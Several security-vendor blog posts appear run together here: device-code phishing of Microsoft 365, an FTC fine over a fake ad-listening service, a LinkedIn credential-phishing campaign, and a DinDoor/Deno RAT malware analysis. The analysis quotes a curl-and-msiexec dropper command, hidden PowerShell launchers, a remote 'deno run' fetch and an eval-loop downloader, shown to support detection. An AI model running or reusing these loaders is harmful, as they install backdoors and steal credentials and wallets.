The agency is now warning about “Kali365,” a phishing‑as‑a‑service (PhaaS) platform that helps even low‑skilled attackers hijack Microsoft 365 accounts by stealing access tokens instead of passwords.

Although early reporting focuses on attacks against organizations, the underlying technique works just as easily against individual Microsoft 365 users who are tricked into entering a short code on a real Microsoft website. In other words, this is not just a business or IT department problem. It could affect anyone with an Outlook, OneDrive, or Microsoft 365 subscription.

For cybercriminals using the kit, it offers three clear advantages:

• It bypasses multi‑factor authentication (MFA) by stealing access tokens, so extra codes or apps no longer help once the token is compromised.
• Kali365 provides ongoing access. The attackers can keep using Outlook, Teams, and OneDrive without repeatedly logging in, as long as the stolen refresh token remains valid.
• Little technical skill needed. Cybercriminals can subscribe to Kali365 and immediately run token‑stealing campaigns at scale.

What does the attack look like?

Victims receive a phishing message that looks like it comes from a cloud service or collaboration tool, such as a document‑sharing notification or Teams invite. The message includes a short “device code” and instructions like: “Go to Microsoft’s verification page and enter this code to view the document.”

Scam or legit? Scam Guard knows.

TRY IT NOW

Unlike many phishing emails, this one sends you to a real Microsoft URL used for device sign‑in flows. To the user, the page looks familiar and completely legitimate, which lowers suspicion.

Victims then see the standard Microsoft sign‑in and consent screens and may think they are simply completing a normal security check. They never see a fake page, never type their password into a suspicious form, and may even see their organization’s branding.

But what they don’t realize is that they have handed access to the attacker.

Once the victim approves the request, the attacker’s device receives OAuth access and refresh tokens tied to the victim’s Microsoft 365 account. These tokens are what Microsoft uses to “remember” that you have already logged in, and they can be reused to access Outlook, OneDrive, Teams, and other Microsoft services without entering a password again.

With valid refresh tokens, attackers can maintain long‑term access until the tokens are revoked or expire, often blending in with normal account activity.

That access can allow cybercriminals to:

• Read Outlook emails, including password reset messages
• Access files stored in OneDrive or SharePoint
• Send phishing emails to coworkers, customers, friends, or family from the victim’s account

How to protect yourself

Once in Outlook, attackers can not only read your messages but also send convincing new ones from your address, using your identity to compromise additional accounts and contacts.

Some tips to steer clear of this one:

• Never enter a code at a Microsoft login page just because an email or message tells you to. You should only do this when you initiated the sign‑in yourself on your own device.
• Slow down and read the prompts. Rushing through login approvals without reading them carefully can be costly.
• Be suspicious of unexpected document shares, Teams invites, or login requests, even if they use legitimate Microsoft pages.
• Review which devices are logged in under your account at https://account.microsoft.com/devices/. If you see unfamiliar devices or sign‑ins, remove them, change your Microsoft account password, and review your security settings.

Pro tip: Malwarebytes Scam Guard can help you figure out if a message is a scam.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

A media company and two of its marketing partners have been fined for selling a service which, they said, listened in to people’s conversations through their phones. Actually they did nothing of the sort.

Most people have worried at some point that their phone has been listening to them through the microphone. You know how it goes: One minute you’re speaking to your friend about how you’ve always wanted to go to Fiji, the next minute you’re seeing social media ads for vacations there. However, as yet there hasn’t been much real proof that this is actually happening.

But that didn’t stop Cox Media Group from claiming it could listen in. Between 2023 and 2024, the company publicly promoted a service called “Active Listening” or “Voice Data,” claiming it used AI-powered voice-processing technology to capture conversations from smartphones, along with smart TVs and other devices with embedded microphones. 

The company told potential advertising clients that the system provided a tool to target, retarget, and retain customers.

The scandal came to light when 404 Media published internal pitch decks from Cox that detailed the supposed “Active Listening” capabilities. After the revelations, Cox initially backpedaled and denied listening to conversations, but the marketing materials contradicted these denials. 

The FTC found that the “Active Listening” service was completely fabricated. The service did not listen to consumers’ conversations or use voice data at all, nor did it accurately place ads in customers’ desired geographic locations. Instead, Cox and its partners simply resold email lists obtained from other data brokers at a significant markup.

Worst of all, the companies also falsely claimed that consumers had opted into voice data collection when they had not.

The Federal Trade Commission (FTC) fined the companies a total of $930,000 for falsely claiming they could spy on consumers. Cox Media Group must pay $880,000, while MindSift and 1010 Digital Works will each pay $25,000. The settlement funds will be used to provide refunds to Cox Media Group customers who were deceived by these false claims.

Are your details being used by cybercriminals? 

FIND OUT HERE

How to safekeep your personal data

In this case, the data that was being sold came from data brokers. Keeping your personal data away from them requires a combination of preventive measures and active removal efforts.

• Minimize what you share on social media and elsewhere online. Data brokers use scraping tools to gather information from forum posts and public profiles so avoid sharing sensitive details like your birth date, home address, phone number, and financial information. 
• Before signing up for online services, loyalty programs, or apps, carefully read privacy policies to understand how companies will collect, use, and share your data.
• For active data removal, your options depend largely on where you live. It’s often best to leave that work to a specialized service you can trust.
• Disable advertising IDs on your smartphones, tablets, and computers through your device settings where possible.
• Use a VPN to hide your IP address and encrypt your browsing traffic, install ad and tracking blockers, and consider using more privacy-focused browsers.

Still wondering if your phone is listening to you?

We looked into this very topic on our Lock and Code podcast. Listen to it below, or search for it on your favorite podcast player.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

Cybercriminals are abusing Adobe infrastructure in a LinkedIn phishing campaign that steals passwords and redirects victims to the legitimate LinkedIn site afterward.

The phishing email masquerades as a business inquiry designed to look like it’s come via LinkedIn and includes a fake “contract” attachment. But it contains a number of red flags:

• The sender name, email address, and email signature don’t match
• The sender company exists, but not in the US
• The sender name exists, but not at that company
• The attachment has a double file extension: pdf.html

“I would like to do business with you via LinkedIn. I’m a buyer.

Please find attached the signed contract No. #33110:12000pcs.

I look forward to hearing from you. “

Scam or legit? Scam Guard knows.

TRY IT NOW

Double file extensions are often used to mislead recipients into thinking a file is something other than what it really is. The attached HTML file is highly obfuscated. Basically, it’s a one-line JavaScript.

The script uses two common obfuscation methods: URL encoding and Base64 . The script is divided into two Base64-encoded sections.

When you open the attachment, you’ll find a simple login form.

The target’s email address is hardcoded, and you’re unable to change or remove it. Possibly because some researchers have no qualms about flooding the receiving channel with false credentials.

But figuring out the receiving channel is where it gets interesting. Network analysis reveals this URL:

https://lnkd.tt.omtrdc.net/rest/v1/delivery

This domain belongs to Adobe and is associated with the Adobe Target A/B testing platform. But the campaign isn’t using Adobe Target to receive the phished credentials. Instead, attackers are abusing Adobe Target as a redirect/abuse point in the phishing flow. Most likely to track victims who fell for the phishing email.

In the end, it redirects the target to the legitimate business.linkedin.com site to reduce any suspicion the target may still have.

After deobfuscating the scripts, we found the destination for the submitted credentials:

All in all, even with the level of obfuscation, the method is very raw and simple:

POST to: http://a1263367.xsph.ru/taam/Ln.php

With data:

• AA = hardcoded email address
• BB = whatever password the user entered

The PHP file hosted on a .ru domain handles the redirect to LinkedIn, making the victim think they just logged in successfully.

How to stay safe

The good news: Once you know what to look for, these attacks are much easier to spot and block. The bad news: They’re cheap, scalable, and likely to keep circulating.

So, the next time a “PDF” asks for your password in a browser, pause and think about what might be hiding underneath.

Beyond avoiding unsolicited attachments, here are a few ways to stay safe:

• Only access your accounts through official apps or by typing the official website directly into your browser.
• Check file extensions carefully. Even if a file looks like a PDF, it may not be.
• Enable multi-factor authentication for your critical accounts.
• Use an up-to-date, real-time anti-malware solution with a web protection module.

Pro tip: Malwarebytes Scam Guard recognized this email as a scam.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

During our threat hunting activities, we found fake installers and plugins impersonating popular software including ChatGPT, Claude, AutoTune, and Kontakt on GitHub and SourceForge distributing a Deno backdoor known as DinDoor. Attackers are using compromised YouTube channels to distribute links to these platforms. 

DinDoor ultimately drops different types of malware, including a stealthy remote access Trojan (RAT), which also uses the Deno JavaScript runtime.  

Attackers are increasingly abusing alternative JavaScript runtimes like Bun and Deno to bypass traditional detection methods. In one of our recent investigations we documented how attackers are using Bun as an initial infection vector to distribute NWHStealer. And in March, ThreatDown researchers also observed attackers using Deno to deliver CastleLoader through a multi-stage infection chain involving the ClickFix lure.  

These campaigns use Scoop (an alternative installer for Windows) and WinGet (the official Windows package manager) to install Deno on the victim’s machine. They then use the Deno runtime to execute a RAT capable of executing additional payloads, exfiltrating data from browsers, wallets, and other applications, which has an interesting peer-to-peer feature that uses Edge to hide malicious traffic. 

Legitimate platforms abused to spread malware

The infection chain is usually started via MSI files or PowerShell scripts downloaded from GitHub or SourceForge in most of the analyzed cases. Users are usually redirected to these malicious repositories via compromised YouTube channels. These videos currently total more than 50,000 views. 

Compromised YouTube channels with AI-generated videos 

The compromised YouTube channels create posts promoting different software and constantly switch between GitHub accounts to distribute the malware. 

YouTube posts linking to the malicious GitHub repositories

The fake software appears designed to target creators, AI enthusiasts, gamers, and technically inclined users who are more likely to download unofficial tools, cracked software, or community-distributed installers from sites like GitHub and SourceForge. We’ve observed fake MSIs and scripts masquerading as installers and plugins for legitimate software and brands such as ChatGPT, Claude, ZENOLOGY, Ableton Live, AutoTune, Kontakt. 

GitHub repository for fake ChatGPT installer 

The malicious repositories have a command for both Windows and macOS. These repositories ask users to open the terminal and copy a malicious command, which downloads and executes the MSI from GitHub. 

Fake plugin that asks the user to copy and execute the malicious command 

Malicious GitHub accounts create multiple repositories filled with fake software and plugins related to popular software to lure in more users. 

GitHub account with different malicious repositories

We found that the same backdoor was distributed through SourceForge, mimicking a legitimate game software called GearUP and an AI watermark remover software called BWR. 

The malicious MSI files hosted on SourceForge How to stay safe  

The attackers relied heavily on trust. GitHub and SourceForge are legitimate platforms, which makes fake projects look more convincing. We contacted GitHub, which quickly removed the malicious repositories, but users should expect new ones to continue appearing.

Here are  a few simple ways to stay safe:  

• Only download software from official vendor websites.  
• Be skeptical of “free”, cracked, or unofficial versions of paid software. 
• Be cautious with downloads from GitHub, SourceForge, forums, or file-sharing sites, especially from new or unknown accounts. 
• Attackers continue to create new profiles to distribute this malware across platforms.  Check the developer or publisher’s profile, its reputation, and how recently it was created before downloading anything. 
• Check that archive contents, images, and text files align with what you expected to download. Archive names and structures often follow recognizable malicious patterns.  
• Check the file’s publisher and digital signature before you run it. Windows, you can usually check this by right-clicking the file, selecting Properties > Digital Signatures. Keep in mind that a valid signature does not guarantee a file is safe, but missing or suspicious signatures are often a red flag. 

Technical analysis 

The malicious GitHub repositories ask the user to open cmd and execute a malicious command. The malicious commands download an MSI from GitHub and install it via msiexec. These repositories sometimes also contain PowerShell scripts to similarly initiate the infection chain. 

Example of a malicious command hosted on GitHub that starts the infection chain: 

curl -Lo %temp%\s.msi https://raw.githubusercontent.com/claude-free-plugin/install/main/install.msi && msiexec /i %temp%\s.msi 

The MSI drops a CMD file and a PowerShell script in a random directory specified in the MSI InstallationFolder and registry values. We detected different structures for these MSIs, with JavaScript instead of the CMD file, or with additional embedded files.

The “Ps1File” and “CmdFile” inside the MSI dropper

The CMD file executes the PowerShell script, with a name that changes in the analyzed infection chains: 

@set "SCRIPTDIR=%~dp0" @powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Start-Process powershell -ArgumentList ('-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File ""' + $env:SCRIPTDIR + '{Random name}.ps1""') -WindowStyle Hidden" 

The executed PowerShell script

The PowerShell script takes care of: 

• Ensuring the package manager Scoop is installed, and installing it if missing with the official script from get.scoop.sh. Scoop is a popular, open-source command-line software installer and package manager for Microsoft Windows. 
• Using Scoop to install WinGet (Windows Package Manager) if missing.  
• Installs Deno (a JavaScript/TypeScript runtime) via WinGet or Scoop if not present.

The usage of the package managers Scoop and WinGet to install additional software on the compromised machine is an interesting approach that gives the attacker more flexibility. 

Command executed to install Deno using WinGet: 

"C:\Users\admin\scoop\apps\winget\current\winget.exe" install --id DenoLand.Deno -e --accept-source-agreements --accept-package-agreements --silent The DinDoor Backdoor 

Next, the following stage is executed with the downloaded Deno executable: 

"C:\Users\admin\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe" run -A http://{C2}/{random_path}.js

The returned code (the internal name is “launcher-1”) is a small eval-loop function that downloads the next stage (the internal name is “launcher-2”). The downloaded backdoor is publicly known as DinDoor. 

var a="{C2}".split(","),i=0;for(;;){let e=null;try{let t=await fetch(a[i%a.length]+"/{BUILD_ID}.js");if(!t.ok)throw 0;e=await t.text()}catch{i++,await new Promise(t=>setTimeout(t,5e3));continue}try{await(0,eval)("(async()=>{"+e+"})()")}catch{}await new Promise(t=>setTimeout(t,3e4))}

The backdoor handles persistence, sends information about the compromised system to the command-and-control server (C2), and executes additional payloads and commands returned by the C2.  The HTTP endpoints used for C2 communications vary between the analyzed cases.  

The backdoor obtains an ID from an HTTP endpoint (for example, /security-pool) and then uses that ID to obtain the next stage from /v2{ID}.js.   

The obtained stage is executed via stdin without being written to disk, using the command: 

deno run -A --no-check –

To achieve persistence, the backdoor runs a PowerShell command to create a RUN key that executes the downloader “launcher-1” used previously: 

conhost.exe --headless "<deno.exe>" -A "%APPDATA%\<hash>.js

This backdoor distributes several malware families in the analyzed cases. In this blog, we analyze one of the distributed payloads: a RAT that uses the Deno JavaScript runtime. 

Deno RAT 

The delivered RAT, like the other analyzed scripts, uses the Deno JavaScript environment and has full functionality to control the device, execute commands and payloads, and exfiltrate various types of data through its built-in stealer module.  

We did not find a specific name or attribution for this RAT. In the past, the RAT has been referred to as “Smokest” based on a specific value in the config. The similar commenting style and shared infrastructure suggest that the DinDoor developer and the RAT developer may be the same person or team. 

Picked up something you shouldn’t have?

RUN A FREE VIRUS SCAN

In addition to HTTP for C2 communication, the RAT also supports WebSocket communication, enabled when the JSON value isLiveEnabled returned from the C2 is set to true. 

The main function of the Deno RAT

The RAT supports different commands (exec, exec-ps, exec-sc, sysinfo, screenshot, stealer) and functionality: 

• Collect system information about the compromised device 
• Full bidirectional control through a custom VNC implementation over WebSocket 
• Target more than 50 crypto wallet extensions and 10 crypto software folders such as Atomic Wallet, Exodus, Electrum, and ByteCoin
• Collect data from browsers including Chrome, Chromium, Brave, Edge, Avast Browser, Edge, Opera, Vivaldi, CentBrowser, Kometa, Orbitum, 360Browser, and  Chromodo 
• Exfiltrate Telegram, Discord, and Lightcord data 
• Record and modify clipboard data  
• List folders, files and exfiltrate content from files with specific extensions  
• Capture screenshots using different methods  
• Execute additional payloads  
• Launch or terminate arbitrary processes  
• Execute commands with PowerShell  
• Establish SOCKS5 proxy tunnels over WebSocket 

One of the most interesting parts of the RAT is a peer-to-peer streaming mode that uses the Edge browser to hide traffic and make detection more difficult.

To stream live video directly to the operator without routing it through the C2 server, the RAT spawns a hidden Microsoft Edge process and connects to it via Chrome DevTools Protocol (CDP). It then injects a small WebRTC HTML page into Edge, turning the legitimate browser into a peer-to-peer video relay. The Deno agent captures and H.264-encodes the victim’s screen, passes the frames to the Edge page over CDP, and Edge forwards them directly to the operator’s browser over an encrypted WebRTC DataChannel. SDP and ICE signaling, needed to establish the direct connection, is exchanged through the existing C2 WebSocket. 

The injected HTML page inside Edge browser 

The RAT uses the following endpoints for C2 communication, which can vary between samples: 

• /health: checks the “ok” response from the C2 
• /token: receive config parameters, task delivery, results, and exfiltrated data 
• /vnc/agent/: WebSocket path used for VNC communication 

The config data is Base64-encoded and is sent in communications with the C2 as an authorization token. Decoded config data: 

{    "buildId": "cd361ef3159f5ce9",    "buildNote": "BWR",    "buildType": "msi-v2",    "proxyUrls": ["{C2}"],    "userId": "…",    "accessTokenHash": "…",    "iat": 1779372546,    "exp": 2094948546  }

We found different versions of this RAT, including a “light” version called “agent-lite” that supports only a few commands and uses Cloudflare Workers for C2 communication. 

The “light” version of the RAT

 

Acknowledgements 

• DinDoor: https://hunt.io/blog/dindoor-deno-runtime-backdoor-msi-analysis 
• Smokest: https://x.com/vxunderground/status/2013006601133687004 

Indicators of Compromise (IOCs) 

URLs 

• https[:]//github.com/claude-free-plugin/
• https[:]//github.com/ai-gen-profi 
• https[:]//github.com/wharfdemolisherpit 
• https[:]//sourceforge.net/projects/gearup/ 
• https[:]//sourceforge.net/projects/bluewaveremover/

Domains 

• claudescript[.]top: distribution website 
• ms-telemetry-gateway-us[.]com: C2 
• dakatawebstick[.]com: C2 
• ashpaltlonpro[.]com: C2 
• cf-proxy[.]cloud-analytics-services[.]workers.dev: C2 
• agilemast3r[.]duckdns[.]org: C2 
• geralnewlong[.]com: C2 
• hngfbgfbfb[.]cyou: C2 
• logicalnewrestore[.]com: C2

IPs 

• 23[.]227[.]196[.]107: C2 
• 45[.]137[.]99[.]121: C2 
• 31[.]57[.]129[.]23: C2 
• 66[.]78[.]40[.]107: C2 
• 193[.]233[.]198[.]132: C2

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.